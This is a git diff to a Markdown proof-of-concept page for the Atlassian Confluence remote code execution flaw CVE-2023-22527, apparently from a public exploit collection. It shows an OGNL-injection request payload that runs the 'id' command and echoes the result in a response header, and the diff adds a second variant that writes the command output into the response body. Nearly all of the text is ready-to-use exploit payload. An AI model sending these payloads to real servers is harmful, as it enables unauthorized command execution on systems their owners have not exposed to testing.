diff --git a/Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527).md b/Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527).md
index 4a913e4..9c78561 100644
--- a/Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527).md	
+++ b/Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527).md	
@@ -32,6 +32,12 @@ Content-Type: application/x-www-form-urlencoded
 Content-Length: 285
 
 label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
+```
+
+回显在body exp
+```
+label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter.write((new+freemarker.template.utility.Execute()).exec({"id"}))
+
 ```
 ![image](https://github.com/wy876/POC/assets/139549762/60ed0618-c378-49c4-bbdc-c7c8067cb461)